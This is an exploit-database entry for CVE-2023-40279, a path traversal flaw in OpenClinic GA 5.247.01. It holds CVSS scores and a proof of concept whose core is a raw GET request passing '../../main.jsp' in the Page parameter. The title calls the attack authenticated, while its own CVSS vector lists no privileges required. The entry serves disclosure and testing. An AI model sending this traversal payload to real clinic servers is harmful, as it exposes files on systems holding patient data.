Lucene search

K
zdtBot1337DAY-ID-39561
HistoryApr 15, 2024 - 12:00 a.m.

OpenClinic GA 5.247.01 - Path Traversal (Authenticated) Vulnerability

2024-04-1500:00:00
bot
0day.today
168
openclinic
path traversal
vulnerability
directory traversal
information disclosure
windows 10
windows 11
cve-2023-40279

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.1

Confidence

Low

EPSS

0.002

Percentile

61.6%

# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/
# Version: OpenClinic GA 5.247.01
# Tested on: Windows 10, Windows 11
# CVE: CVE-2023-40279

# Details
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.

# Proof of Concept (POC)
Steps to Reproduce:

- Crafting the Malicious GET Request:

- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):

GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host: 192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control: max-age=0

2. Confirming the Vulnerability:
- Send the crafted GET request to the target server.
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
- This vulnerability can lead to sensitive information disclosure or more severe attacks.

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.1

Confidence

Low

EPSS

0.002

Percentile

61.6%